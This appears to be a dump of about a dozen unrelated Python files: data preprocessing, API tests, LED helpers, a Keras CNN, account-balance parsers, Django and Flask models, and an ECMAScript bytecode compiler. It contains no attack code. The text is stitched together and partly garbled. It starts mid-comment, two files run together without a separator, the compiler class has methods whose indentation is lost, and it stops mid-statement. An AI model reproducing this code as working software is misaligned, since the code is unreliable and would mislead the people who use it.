# rows from df itself — confirm whether df-level dropna was intended.
df['age'].dropna(inplace=True)
df['ageInt'] = df['age'].astype(int)
# Restrict to plausible adult ages and drop infinities.
select = df['ageInt'].loc[(df['ageInt'] > 15) & (df['ageInt'] < 80) & (df['ageInt'] != np.inf) & (df['ageInt'] != -np.inf)]
print(select.shape)
# NOTE(review): indexing with `select` uses the age VALUES as labels, not the
# selected row labels — df['ageInt'][select.index] looks intended; verify.
age = df['ageInt'][select]
indexes = select.index.values
images = df['imagePath'][indexes]
ages = {}
# argv[1]: file listing training image paths, one per line.
trainImages = open(sys.argv[1]).readlines()
trainImages = [image.strip().split('/')[-1] for image in trainImages]
for i in range(len(indexes)):
    image = df['imagePath'][indexes[i]].split('/')[-1]
    if image in trainImages:
        ages[image] = df['ageInt'][indexes[i]]
pickle.dump(ages, open("ages.pkl", "wb"))
|
import requests
import uuid
def test_crop_validation(hostname, large_file):
    """
    Test edge cases of cropping an image
    :param hostname: The hostname under test (this fixture is automatically injected by pytest)
    :param large_file: A large-ish filename (this fixture is automatically injected by pytest)
    """
    # Bug fix: open the image in binary mode ('rb'). Text mode ('r') tries to
    # decode raw JPEG bytes as text, which fails or corrupts the upload on
    # Python 3.
    with open(large_file, 'rb') as f:
        resp = requests.post(hostname + '/images',
                             data={'user_id': 'test-user-{}'.format(uuid.uuid4())},
                             files={'file': ('bridge.jpeg', f)})
    img_id = resp.json()['id']
    # Each payload is invalid in a different way; all must be rejected with 400.
    bad_payloads = (
        {'action': 'crop', 'box': '50'},
        {'action': 'crop', 'box': ''},
        {'action': 'crop', 'size': '20,20'}
    )
    for bad_payload in bad_payloads:
        resp = requests.put(hostname + '/image/{}'.format(img_id), data=bad_payload)
        assert resp.status_code == 400, 'Request should have failed but did not with payload: {}'.format(bad_payload)
        assert resp.json()['description'].startswith('Invalid bounding box')
    # Clean up test data and delete the image
    requests.delete(hostname + '/image/{}'.format(img_id))
|
# led-control WS2812B LED Controller Server
# Copyright 2021 jackw01. Released under the MIT License (see LICENSE for details).
import re
import math
import colorsys
# Constrain value
def clamp(x, min, max):
    """Return x limited to the inclusive range [min, max].

    NOTE(review): the parameter names shadow the builtins min()/max(); they
    are kept unchanged for keyword-call compatibility.
    """
    if x < min:
        return min
    if x > max:
        return max
    return x
# Title generation
def camel_to_title(text):
    """Insert a space before each interior capital of a camelCase string."""
    splitter = re.compile(r'((?<=[a-z])[A-Z]|(?<!\A)[A-Z](?=[a-z]))')
    return splitter.sub(r' \1', text)
def snake_to_title(text):
    """Convert snake_case to Title Case ('led_color' -> 'Led Color')."""
    words = text.split('_')
    return ' '.join(words).title()
# Misc shaping functions
# Exponential asymmetric impulse function - peaks at t=1
# See http://www.iquilezles.org/www/articles/functions/functions.htm
def impulse_exp(t):
    """Asymmetric impulse: rises, peaks at 1.0 when t == 1, then decays."""
    falloff = math.exp(1 - t)
    return t * falloff
# Equivalent to GLSL fract - returns the floating point component of a number
def fract(x):
    """Fractional part of x, always in [0, 1) (GLSL-style)."""
    whole = math.floor(x)
    return x - whole
|
from __future__ import print_function
from spyder_window_maker import win_ftset_and_label
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import keras
import tensorflow as tf
import numpy as np
import scipy.io as sio
import cv2
import os
import time
# Training hyper-parameters.
batch_size = 128
num_classes = 3
epochs = 50
# Top-left offset of the 201x201 region cropped from the label/image matrices.
start_point = 49
# Half-width of the square patch extracted around each pixel.
window_size = 3
# input image dimensions
img_rows, img_cols = 2*window_size+1, 2*window_size+1
img_num = [0, 7, 18, 33, 43, 58]
# 'B' packs both labels and image; the nested [0][...] indexing unwraps
# MATLAB cell/struct nesting produced by loadmat.
mat_contents = sio.loadmat('mum-perf-org-new-1-60.mat')
y = mat_contents['B'][0][0][0][0]
img = mat_contents['B'][0][2][0][0]
# Fold class 4 into class 1 so only num_classes labels remain.
y[y == 4] = 1
class_mat = y[start_point:start_point+201, start_point:start_point+201]
img_cut = img[start_point:start_point+201, start_point:start_point+201]
# Build per-pixel window patches plus train/test split.
# NOTE(review): 'win_tyoe' looks like a typo for 'win_type', but it must match
# the keyword actually declared by win_ftset_and_label -- confirm before fixing.
x_train, y_train, x_test, y_test, x_, y_, label_x = win_ftset_and_label(img, img_cut, class_mat
                                    , test_size=.1, win_size=window_size
                                    , win_tyoe='window_square'
                                    , class_num=num_classes)
# the data, split between train and test sets
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
print(x_train.shape[0], 'train samples')
# Reshape to NHWC with a single channel.
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
# Scale pixel values to [0, 1].
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# # convert class vectors to binary class matrices
# y_train = keras.utils.to_categorical(y_train, num_classes)
# y_test = keras.utils.to_categorical(y_test, num_classes)
# NOTE(review): categorical_crossentropy needs one-hot labels; this assumes
# win_ftset_and_label already returns them (to_categorical is disabled) -- confirm.
model = Sequential()
model.add(Conv2D(8, kernel_size=(3, 3),
                 activation='relu',
                 input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
              optimizer=keras.optimizers.Adadelta(),
              metrics=['accuracy'])
model.fit(x_train, y_train,
          batch_size=batch_size,
          epochs=epochs,
          verbose=1,
          validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
import itertools
class Players:
    """Round-robin pool of players.

    Players are stored in a set (no duplicates), so the cycling order is
    arbitrary.  Any add/remove restarts the cycle from a fresh iterator.
    """

    def __init__(self):
        self._players = set()
        self.reset()

    def reset(self):
        # Rebuild the cycle so membership changes are picked up.
        self.player_queue = itertools.cycle(self._players)

    def add(self, player):
        self._players.add(player)
        self.reset()

    def remove(self, player):
        self._players.remove(player)
        self.reset()

    def next(self):
        # Bug fix: use the next() builtin instead of the iterator's .next()
        # method -- .next() is Python 2-only; next() works on 2.6+ and 3.x.
        return next(self.player_queue)
if __name__ == "__main__":
    # Demo: cycle through four players, drop one, and keep cycling.
    # Bug fix: Python 2 print statements replaced with print() calls, which
    # are valid in both Python 2 and Python 3.
    p = Players()
    p.add(1)
    p.add(2)
    p.add(3)
    p.add(8)
    for _ in range(10):
        print(p.next())
    p.remove(3)
    for _ in range(10):
        print(p.next())
|
import logging
log = logging.getLogger(__name__)
class BalanceBase:
    """Translates a raw account payload's balance sections into snake_case dicts.

    dataDict is the raw account payload; subclasses merge account-type-specific
    fields into the dict returned by one of the _getCommon* helpers.
    """

    def __init__(self, dataDict):
        self.dataDict = dataDict

    def _getCommonInitialData(self):
        """Return the snake_cased fields common to every 'initialBalances' section."""
        balances = self.dataDict['initialBalances']
        return {
            'accruedInterest': balances['accruedInterest'],
            'cash_available_for_trading': balances['cashAvailableForTrading'],
            'cash_balance': balances['cashBalance'],
            'bond_value': balances['bondValue'],
            'cash_receipts': balances['cashReceipts'],
            'liquidation_value': balances['liquidationValue'],
            'long_option_market_value': balances['longOptionMarketValue'],
            'long_stock_value': balances['longStockValue'],
            'money_market_fund': balances['moneyMarketFund'],
            'mutual_fund_value': balances['mutualFundValue'],
            # NOTE(review): 'shortOptionMarkeyValue' looks misspelled, but it
            # must match the upstream payload's key -- confirm before changing.
            'short_option_market_value': balances['shortOptionMarkeyValue'],
            'short_stock_value': balances['shortStockValue'],
            'is_in_call': balances['isInCall'],
            'pending_deposits': balances['pendingDeposits'],
            'account_value': balances['accountValue'],
        }

    def _getCommonCurrentData(self):
        """Return the snake_cased fields common to every 'currentBalances' section.

        Bug fix: this method previously built the dict but never returned it,
        so every caller received None and crashed on .update().
        """
        balances = self.dataDict['currentBalances']
        return {
            'accruedInterest': balances['accruedInterest'],
            'cash_balance': balances['cashBalance'],
            'bond_value': balances['bondValue'],
            'cash_receipts': balances['cashReceipts'],
            'liquidation_value': balances['liquidationValue'],
            'long_option_market_value': balances['longOptionMarketValue'],
            'long_market_value': balances['longStockValue'],
            'money_market_fund': balances['moneyMarketFund'],
            'mutual_fund_value': balances['mutualFundValue'],
            'short_option_market_value': balances['shortOptionMarkeyValue'],
            'short_market_value': balances['shortStockValue'],
            'pending_deposits': balances['pendingDeposits'],
            'savings': balances['savings']
        }
class CashInitialBalancesParse(BalanceBase):
    """Parser for the initial balances of a cash account."""

    def __init__(self, dataDict):
        super().__init__(dataDict)
        self.dataDict = dataDict
        self.commonData = self._getCommonInitialData()

    def _getData(self):
        """Merge the cash-account-only initial fields into commonData.

        Bug fix: these lookups used 'initalBalances' (missing an 'i'), a key
        that can never exist -- the base class reads 'initialBalances' from
        the same payload -- so this method always raised KeyError.
        """
        initial = self.dataDict['initialBalances']
        self.commonData.update({
            'cash_available_for_withdrawal': initial['cashAvailableForWithdrawal'],
            'unsettled_cash': initial['unsettledCash'],
            'cash_debit_call_value': initial['cashDebitCallValue']
        })
class CashCurrentBalancesParse(BalanceBase):
    """Parser for the current balances of a cash account."""

    def __init__(self, dataDict):
        super().__init__(dataDict)
        self.dataDict = dataDict
        self.commonData = self._getCommonCurrentData()

    def _getData(self):
        """Merge the cash-account-only current fields into commonData."""
        current = self.dataDict['currentBalances']
        extras = {
            'cash_available_for_trading': current['cashAvailableForTrading'],
            'cash_available_for_withdrawal': current['cashAvailableForWithdrawal'],
            'cash_call': current['cashCall'],
            'long_non_marginable_market_value': current['longNonMarginableMarketValue'],
            'total_cash': current['totalCash'],
            'cash_debit_call_value': current['cashDebitCallValue'],
            'unsettled_cash': current['unsettledCash']
        }
        self.commonData.update(extras)
class CashProjectedBalancesParse:
    """Placeholder parser for the projected balances of a cash account.

    Currently only stores the raw payload; no parsing is implemented yet.
    """
    def __init__(self, dataDict):
        self.dataDict = dataDict
class MarginInitialBalancesParse(BalanceBase):
    """Parser for the initial balances of a margin account."""

    def __init__(self, dataDict):
        super().__init__(dataDict)
        self.dataDict = dataDict
        self.commonData = self._getCommonInitialData()

    def _getData(self):
        """Merge the margin-account-only initial fields into commonData."""
        initial = self.dataDict['initialBalances']
        extras = {
            'available_funds_non_marginable_trade': initial['availableFundsNonMarginableTrade'],
            'buying_power': initial['buyingPower'],
            'day_trading_power': initial['dayTradingPower'],
            'day_trading_buying_power_call': initial['dayTradingBuyingPowerCall'],
            'day_trading_equity_call': initial['dayTradingEquityCall'],
            'equity': initial['equity'],
            'equity_percentage': initial['equityPercentage'],
            'long_margin_value': initial['longMarginValue'],
            'maintenance_call': initial['maintenanceCall'],
            'maintenance_requirement': initial['maintenanceRequirement'],
            'margin': initial['margin'],
            'margin_equity': initial['marginEquity'],
            'reg_t_call': initial['regTCall'],
            'short_margin_value': initial['shortMarginValue'],
            'total_cash': initial['totalCash'],
            'margin_balance': initial['marginBalance']
        }
        self.commonData.update(extras)
class MarginCurrentBalancesParse(BalanceBase):
    """Parser for the current balances of a margin account."""

    def __init__(self, dataDict):
        super().__init__(dataDict)
        self.dataDict = dataDict
        self.commonData = self._getCommonCurrentData()

    def _getData(self):
        """Merge the margin-account-only current fields into commonData."""
        current = self.dataDict['currentBalances']
        self.commonData.update({
            'available_funds': current['availableFunds'],
            # Bug fix: this previously read 'availableFunds' again (copy/paste);
            # the non-marginable figure has its own key, mirroring the
            # initial-balances parser above. Confirm against live payloads.
            'available_funds_non_marginable_trade': current['availableFundsNonMarginableTrade'],
            'buying_power': current['buyingPower'],
            'buying_power_non_marginable_trade': current['buyingPowerNonMarginableTrade'],
            'day_trading_buying_power': current['dayTradingBuyingPower'],
            'equity': current['equity'],
            'equity_percentage': current['equityPercentage'],
            'long_margin_value': current['longMarginValue'],
            'maintenance_call': current['maintenanceCall'],
            'maintenance_requirement': current['maintenanceRequirement'],
            'margin_balance': current['marginBalance'],
            'reg_t_call': current['regTCall'],
            'short_balance': current['shortBalance'],
            'short_margin_value': current['shortMarginValue'],
            'sma': current['sma']
        })
class MarginProjectedBalancesParse:
    """Placeholder parser for the projected balances of a margin account.

    Currently only stores the raw payload; no parsing is implemented yet.
    """
    def __init__(self, dataDict):
        self.dataDict = dataDict
|
from django.views.generic import TemplateView
# Create your views here.
from core.models import Post
class HomeView(TemplateView):
    """Render the home page with up to ten published posts.

    Posts are ordered by ascending ``published_at`` (earliest first).
    NOTE(review): if "latest posts first" was intended, the ordering should
    be ``-published_at`` -- confirm.
    """
    template_name = 'home.html'

    def get_context_data(self, **kwargs):
        context = super(HomeView, self).get_context_data(**kwargs)
        published = Post.objects.filter(is_published=True)
        context['posts'] = published.order_by("published_at")[:10]
        return context
|
import requests
from adhack.settings import GODADDY_KEY, GODADDY_SECRET, GODADDY_API
def check_domain(name):
    """
    r = requests.get(GODADDY_API+name, headers={
        "Accept": "application/json",
        "Authorization": "sso-key {}:{}".format(
            GODADDY_KEY,
            GODADDY_SECRET
        )
    })
    """
    # NOTE(review): the GoDaddy availability request above is parked inside the
    # docstring (i.e. disabled), so every domain is currently reported as
    # available. Re-enable and inspect the response before shipping.
    return True
|
import unittest
from google.appengine.ext import testbed, ndb
from mock import patch
from src.commons.big_query.copy_job_async.copy_job.copy_job_request \
import CopyJobRequest
from src.commons.big_query.copy_job_async.copy_job_service_async \
import CopyJobServiceAsync
from src.commons.big_query.copy_job_async.post_copy_action_request \
import PostCopyActionRequest
from src.commons.big_query.copy_job_async.task_creator \
import TaskCreator
from src.commons.big_query.big_query import BigQuery
from src.commons.big_query.big_query_table import BigQueryTable
class TestCopyJobServiceAsync(unittest.TestCase):
    """Tests for CopyJobServiceAsync.

    External GCP discovery/credential calls are patched out in setUp;
    TaskCreator.create_copy_job is mocked per-test so each test can assert
    the exact CopyJobRequest that would have been enqueued.
    """

    def setUp(self):
        self.testbed = testbed.Testbed()
        self.testbed.activate()
        ndb.get_context().clear_cache()
        # Stub out external Google API clients -- no network access in tests.
        patch('googleapiclient.discovery.build').start()
        patch(
            'oauth2client.client.GoogleCredentials.get_application_default') \
            .start()

    def tearDown(self):
        patch.stopall()
        self.testbed.deactivate()

    def create_example_target_bq_table(self):
        """Fixture: an arbitrary copy-destination table."""
        return BigQueryTable("target_project_id_1",
                             "target_dataset_id_1",
                             "target_table_id_1")

    def create_example_source_bq_table(self):
        """Fixture: an arbitrary copy-source table."""
        return BigQueryTable("source_project_id_1",
                             "source_dataset_id_1",
                             "source_table_id_1")

    @patch.object(BigQuery, 'insert_job', return_value="job_id_123")
    @patch.object(TaskCreator, 'create_copy_job')
    def test_that_queue_task_was_invoked_with_default_retry_count_value(
            self, create_copy_job, _):
        """copy_table without options enqueues a request with retry_count=0."""
        # given
        # when
        CopyJobServiceAsync(
            copy_job_type_id="test-process",
            task_name_suffix="example_sufix"
        ).copy_table(
            self.create_example_source_bq_table(),
            self.create_example_target_bq_table()
        )
        # then
        expected_retry_count = 0
        create_copy_job.assert_called_once_with(
            CopyJobRequest(
                task_name_suffix="example_sufix",
                copy_job_type_id="test-process",
                source_big_query_table=(self.create_example_source_bq_table()),
                target_big_query_table=(self.create_example_target_bq_table()),
                create_disposition="CREATE_IF_NEEDED",
                write_disposition="WRITE_EMPTY",
                retry_count=expected_retry_count
            )
        )

    @patch.object(TaskCreator, 'create_copy_job')
    def test_that_post_copy_action_request_is_passed(
            self, create_copy_job):
        """with_post_action() forwards the post-copy request in the job."""
        # given
        post_copy_action_request = \
            PostCopyActionRequest(url="/my/url", data={"key1": "value1"})
        # when
        CopyJobServiceAsync(
            copy_job_type_id="test-process",
            task_name_suffix="example_sufix"
        ).with_post_action(
            post_copy_action_request
        ).copy_table(
            self.create_example_source_bq_table(),
            self.create_example_target_bq_table()
        )
        # then
        create_copy_job.assert_called_once_with(
            CopyJobRequest(
                task_name_suffix="example_sufix",
                copy_job_type_id="test-process",
                source_big_query_table=(self.create_example_source_bq_table()),
                target_big_query_table=(self.create_example_target_bq_table()),
                create_disposition="CREATE_IF_NEEDED",
                write_disposition="WRITE_EMPTY",
                retry_count=0,
                post_copy_action_request=post_copy_action_request
            )
        )

    @patch.object(TaskCreator, 'create_copy_job')
    def test_that_create_and_write_disposition_are_passed_if_specified(
            self, create_copy_job):
        """Explicit dispositions override the defaults in the enqueued job."""
        # given (local-name typo fix: was create_dispositon / write_dispostion)
        create_disposition = "SOME_CREATE_DISPOSITON"
        write_disposition = "SOME_WRITE_DISPOSTION"
        # when
        CopyJobServiceAsync(
            copy_job_type_id="test-process",
            task_name_suffix="example_sufix"
        )\
            .with_create_disposition(create_disposition)\
            .with_write_disposition(write_disposition)\
            .copy_table(
                self.create_example_source_bq_table(),
                self.create_example_target_bq_table()
            )
        # then
        create_copy_job.assert_called_once_with(
            CopyJobRequest(
                task_name_suffix="example_sufix",
                copy_job_type_id="test-process",
                source_big_query_table=(self.create_example_source_bq_table()),
                target_big_query_table=(self.create_example_target_bq_table()),
                create_disposition=create_disposition,
                write_disposition=write_disposition,
                retry_count=0,
                post_copy_action_request=None
            )
        )

    def test_that_assertion_error_if_no_type_provided(self):
        """Typo fix: method was previously named ..._erro_... ."""
        with self.assertRaises(AssertionError) as error:
            CopyJobServiceAsync(
                copy_job_type_id=None,
                task_name_suffix="example_sufix"
            ).copy_table(None, None)
        # NOTE(review): .message is Python 2-only; matches the GAE py2 runtime.
        self.assertEqual(error.exception.message, "copy_job_type_id needs to be assigned in constructor")

    def test_that_assertion_error_if_no_task_name_suffix_provided(self):
        with self.assertRaises(AssertionError) as error:
            CopyJobServiceAsync(
                copy_job_type_id="test-process",
                task_name_suffix=None
            ).copy_table(None, None)
        self.assertEqual(error.exception.message, "task_name_suffix needs to be assigned in constructor")
|
# -*- coding: utf-8 -*-
from app import db, login
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
class User(UserMixin, db.Model):
    """Application user with hashed-password authentication."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(64), index=True, unique=True)
    email = db.Column(db.String(120), index=True, unique=True)
    # Salted hash only -- plaintext passwords are never stored.
    password_hash = db.Column(db.String(128))
    def __repr__(self):
        return '<User {}>'. format(self.username)
    # NOTE(review): defined inside the class body, but the decorator registers
    # the plain function with Flask-Login before class binding, so it is still
    # called as load_user(id). Conventionally this lives at module level.
    @login.user_loader
    def load_user(id):
        return User.query.get(int(id))
    def set_password(self, password):
        self.password_hash = generate_password_hash(password)
    def check_password(self, password):
        return check_password_hash(self.password_hash, password)
#invoice_statement = db.Table('mn_invoice_statement',
# db.Column('invoice_id', db.Integer, db.ForeignKey('pkvinvoice.id'), primary_key=True),
# db.Column('insurance_statement_id', db.Integer, db.ForeignKey('insurance_statement.id'), primary_key=True)
#)
class PKVInvoice(db.Model):
    """A doctor's invoice tracked through the private-insurance (PKV) workflow."""
    __tablename__= "pkvinvoice"
    id = db.Column(db.Integer, primary_key=True)
    #patient = db.Column(db.String(64), index=True, nullable=False)
    invoice_date = db.Column(db.Date)
    due_date = db.Column(db.Date)
    #drs = db.Column(db.Integer, db.ForeignKey('doctor.id'), nullable=False)
    amount = db.Column(db.Float)
    comment = db.Column(db.String(250))
    informed_me = db.Column(db.String())
    # Lifecycle timestamps; NOTE(review): the commented booleans appear to
    # have been replaced by these nullable dates -- confirm before cleanup.
    # sent_to_pkv = db.Column(db.Boolean)
    sent_at = db.Column(db.Date, nullable=True)
    # paid = db.Column(db.Boolean)
    paid_at = db.Column(db.Date, nullable=True)
    # repaid = db.Column(db.Boolean)
    repaid_at = db.Column(db.Date, nullable=True)
    state = db.Column(db.String(16))
    patient_id = db.Column(db.Integer, db.ForeignKey('patients.id'))
    statement_id = db.Column(db.Integer, db.ForeignKey('insurance_statement.id'), nullable=True)
    def __repr__(self):
        return '<Invoice {}-{}>'.format(self.invoice_date, self.patient_id )
class Insurance_statement(db.Model):
    """An insurer's reimbursement statement covering one or more invoices."""
    __tablename__= "insurance_statement"
    id = db.Column(db.Integer, primary_key=True)
    date = db.Column(db.DateTime)
    amount_repaid = db.Column(db.Float)
    # Bug fix: backref was 'statement ' (trailing space), which created an
    # attribute on PKVInvoice that normal attribute syntax cannot reach.
    invoices = db.relationship('PKVInvoice', backref='statement', lazy=True)
    def __repr__(self):
        # NOTE(review): repr says 'Invoice' for a statement -- possibly misleading.
        return '<Invoice {}>'.format(self.date)
class Patients(db.Model):
    """A patient; owns the invoices issued for them."""
    # Bug fix: was '__tablename' (missing trailing underscores), which
    # SQLAlchemy silently ignores.
    __tablename__ = 'patients'
    id = db.Column(db.Integer, primary_key=True)
    patient = db.Column(db.String(64), index=True, nullable=False)
    invoices = db.relationship('PKVInvoice', backref='patient', lazy=True)
    def __init__(self, name):
        self.patient = name
    def __repr__(self):
        # Bug fix: previously referenced self.name, which does not exist
        # (AttributeError); the column is named 'patient'.
        return '<Patient %s>' % self.patient
class SelfPaid(db.Model):
    """Yearly amount paid out of pocket.

    NOTE(review): purpose inferred from the class name -- confirm.
    """
    id = db.Column(db.Integer, primary_key=True)
    year = db.Column(db.Integer)
    amount = db.Column(db.Float)
|
#Generated from java-escape by ANTLR 4.4
import antlr4
import Utils
import ECMAScriptParser
from VirtualMachine.OpCode import OpCode
from VirtualMachine.Code import Code
from VirtualMachine.Instruction import Instruction
from VirtualMachine.Stack import Stack
from ECMAScriptParser import ECMAScriptVisitor
from Interpreter.Console import Console
from Interpreter.Math import MathModule
from Interpreter.Environment import Environment
from Interpreter.Function import Function
from Interpreter.Object import Object, ObjectModule
from Interpreter.Property import Property
def printCtx(ctx, level=14, tab="", path="ctx"):
    """Recursively dump a parse (sub)tree for debugging.

    Disabled: the 'if 1==2' guard makes this a no-op; flip it to enable
    the debug output. level limits recursion depth; tab/path track
    indentation and the access path for display.
    """
    if 1==2:
        num = -1;
        if (ctx.children != None):
            print(tab,"list of ", ctx.getChildCount(), "")
            for c in ctx.children:
                num = num + 1
                path_ = path + " " + str(num) +" -"# ".children[" + str(num) + "]"
                if(isinstance(c, antlr4.tree.Tree.TerminalNodeImpl)):
                    print(tab, path_, " is ", c.symbol.text)
                else:
                    print(tab, path_, " is list ->")
                    if (level > 0):
                        printCtx(c, level-1, tab + "  ", path_)
        else:
            # NOTE(review): 'c' is undefined on this path (dead debug code).
            print(tab, "children: ", c)
        print("")
def sPrintCtx(ctx):
    """Print a one-line summary for each direct child of ctx, then a blank line."""
    if ctx.children is not None:
        for idx, child in enumerate(ctx.children):
            label = "ctx.children[" + str(idx) + "]"
            if isinstance(child, antlr4.tree.Tree.TerminalNodeImpl):
                print(label, " is ", child.symbol.text)
            else:
                print(label, " is ", child)
    print("")
def dprint(*items):
    """Debug print: space-separated items, no newline. Currently disabled."""
    if 1 == 2:  # flip this guard to enable debug output
        for item in items:
            print(item, end=" ")
# def console(value):
# print(value)
# This class defines a complete generic visitor for a parse tree produced by ECMAScriptParser.
class BytecodeVisitor(ECMAScriptVisitor):
    def __init__(self, program):
        # program: the Code object that emitted instructions are appended to.
        self.program = program
        # lineno counts emitted instructions (used only for debug output).
        self.lineno = 0
        # Patch-up stack holding indices of pending break/continue jumps.
        self.tmpStack = Stack();
    def add_instruction(self, opcode, *arguments):
        """Append an Instruction(opcode, *arguments) to the program and return it."""
        inst = Instruction(opcode, *arguments)
        dprint("add_instruction:", self.lineno, ":", opcode, arguments)
        self.lineno = self.lineno + 1
        self.program.add_instruction(inst)
        return inst
AV_IDENTIFIER = 0
AV_MEMBERDOT = 1
AV_INDICE = 2
def visitTerminal(self, node):
txt = "visitTerminal " + node.symbol.text
dprint(txt)
return node.symbol.text
    # Visit a parse tree produced by ECMAScriptParser#ArgumentsExpression.
    def visitArgumentsExpression(self, ctx):
        """Compile a call: push arguments, 'this', and the callee, then CALL."""
        dprint("visitArugmentsExpression")
        #ordering is important!
        #many accepts do stuff on the stack for you!
        args = ctx.children[1].accept(self)
        linebefore = self.program.current_index()
        this = ctx.children[0].children[0].accept(self) #accept returns nothing but pushes to stack if "this" exists. If it does not exist it returns something...
        lineafter = self.program.current_index()
        # +1 accounts for the 'this' slot passed along with the arguments.
        args = args + 1
        # If visiting the callee prefix emitted no instructions, nothing was
        # pushed for 'this'; push None so CALL sees a fixed stack layout.
        if linebefore == lineafter:
            self.add_instruction(OpCode.PUSH, None)
        func = ctx.children[0].accept(self)
        self.add_instruction(OpCode.CALL, args)
    # Visit a parse tree produced by ECMAScriptParser#elementList.
    def visitElementList(self, ctx):
        """Compile array-literal elements and emit MAKE_ARRAY with their count."""
        dprint("visitElementList")
        i = 0
        for child in ctx.children:
            value = child.accept(self)
            # Separator commas are terminals returning ","; count only elements.
            if not value == ",":
                i = i + 1
        self.add_instruction(OpCode.MAKE_ARRAY, i)
    # Visit a parse tree produced by ECMAScriptParser#ForInStatement.
    def visitForInStatement(self, ctx):
        # for-in loops are not supported by this bytecode compiler.
        raise Utils.UnimplementedVisitorException(ctx)
    # Visit a parse tree produced by ECMAScriptParser#emptyStatement.
    def visitEmptyStatement(self, ctx):
        """An empty statement (';') compiles to nothing."""
        dprint("visitEmptyStatement")
        pass
    # Visit a parse tree produced by ECMAScriptParser#NewExpression.
    def visitNewExpression(self, ctx):
        """Compile 'new Ctor(args)': push args, then the constructor, then NEW."""
        dprint("visitNewExpression")
        nrOfParams = ctx.children[2].accept(self) #() - params
        ctx.children[1].accept(self) #Object
        self.add_instruction(OpCode.NEW, nrOfParams)
    # Visit a parse tree produced by ECMAScriptParser#MemberDotExpression.
    def visitMemberDotExpression(self, ctx):
        """Compile 'obj.member': object left on the stack, then LOAD_MEMBER."""
        dprint("visitMemberDotExpression")
        obj = ctx.children[0].accept(self)
        member = ctx.children[2].accept(self)
        # on top of stack we have obj
        self.add_instruction(OpCode.LOAD_MEMBER, member)
    # Visit a parse tree produced by ECMAScriptParser#tryStatement.
    def visitTryStatement(self, ctx):
        """Compile try/catch[/finally] using TRY_PUSH and back-patched jumps."""
        dprint("visitTryStatement")
        # Placeholder targets; the real addresses are patched in below once known.
        catchAddr = 1337
        finallyAddr = 1338
        TRYPUSHAddr = self.program.current_index()
        self.add_instruction(OpCode.TRY_PUSH, catchAddr)
        ctx.children[1].accept(self) # code to run
        JMPAddr = self.program.current_index()
        self.add_instruction(OpCode.JMP, finallyAddr)
        # Catch block starts here; patch the TRY_PUSH to point at it.
        catchAddr = self.program.current_index()
        self.program.modify_instruction_arg(TRYPUSHAddr, catchAddr)
        ctx.children[2].accept(self) #catch code to run
        # Patch the try-block's JMP to land after the catch code.
        finallyAddr = self.program.current_index()
        self.program.modify_instruction_arg(JMPAddr, finallyAddr)
        # finally clause is present only when there are 4 children
        if ctx.getChildCount() == 4:
            ctx.children[3].accept(self) #code to run
    # Visit a parse tree produced by ECMAScriptParser#DoStatement.
    def visitDoStatement(self, ctx):
        """Compile do/while: run the body once, then jump back while true."""
        dprint("visitDoStatement")
        # [0] = do, [1] = block, [2] = while, [3] = (, [4] = condition, [5] = )
        # run the do-block once
        doStart = self.program.current_index()
        ctx.children[1].accept(self)
        # check condition and rerun do if needed
        ctx.children[4].accept(self) # True/False value pushed to stack
        self.add_instruction(OpCode.IFJMP, doStart)
    # Visit a parse tree produced by ECMAScriptParser#WhileStatement.
    def visitWhileStatement(self, ctx):
        """Compile a while loop; back-patch break/continue jumps recorded on tmpStack.

        Sentinel jump targets: 6000 marks a break, 7000 marks a continue
        (planted by visitBreakStatement / visitContinueStatement).
        """
        dprint("visitWhileStatement")
        #self.add_instruction(OpCode.POP_TO_VAL, exceptionAddr)
        tmpStackSize = self.tmpStack.size()
        # check condition and jump over if false
        placeholderAddr = 1337
        whileStart = self.program.current_index()
        ctx.children[2].accept(self) # True/False value pushed to stack
        unlessJmpAddr = self.program.current_index()
        self.add_instruction(OpCode.UNLESSJMP, placeholderAddr)
        # code to run
        ctx.children[4].accept(self)
        self.add_instruction(OpCode.JMP, whileStart)
        exitWhileAddr = self.program.current_index()
        # used to find out how many breaks and continues have been added in between
        tmpJumpsAdded = self.tmpStack.size() - tmpStackSize
        for i in range(tmpJumpsAdded):
            jump = self.tmpStack.pop()
            addr = self.program.get_instruction_arg(jump)
            addr = addr[0]
            if (addr == 6000): #a break
                self.program.modify_instruction_arg(jump, exitWhileAddr)
                pass
            elif (addr == 7000): #a continue
                self.program.modify_instruction_arg(jump, whileStart)
            else:
                # Unknown sentinel: silently ignored (ShouldNotHappenException).
                pass
        self.program.modify_instruction_arg(unlessJmpAddr, exitWhileAddr)
    # Visit a parse tree produced by ECMAScriptParser#returnStatement.
    def visitReturnStatement(self, ctx):
        """Compile 'return expr': evaluate the expression, then emit RET.

        NOTE(review): children[1] is accepted unconditionally, so a bare
        'return;' is not handled.
        """
        dprint("visitReturnStatement")
        ctx.children[1].accept(self)
        self.add_instruction(OpCode.RET)
    # Visit a parse tree produced by ECMAScriptParser#switchStatement.
    def visitSwitchStatement(self, ctx):
        """Compile 'switch (expr) { ... }': push the scrutinee, then the case block."""
        dprint("visitSwitchStatement")
        ctx.children[2].accept(self) # variable pushes itself onto the stack
        ctx.children[4].accept(self) # the case block (see visitCaseBlock)
# Visit a parse tree produced by ECMAScriptParser#FunctionExpression.
def visitFunctionExpression(self, ctx):
dprint("visitFunctionExpression")
isLambda = False
if(isinstance(ctx.children[2], antlr4.tree.Tree.TerminalNodeImpl)
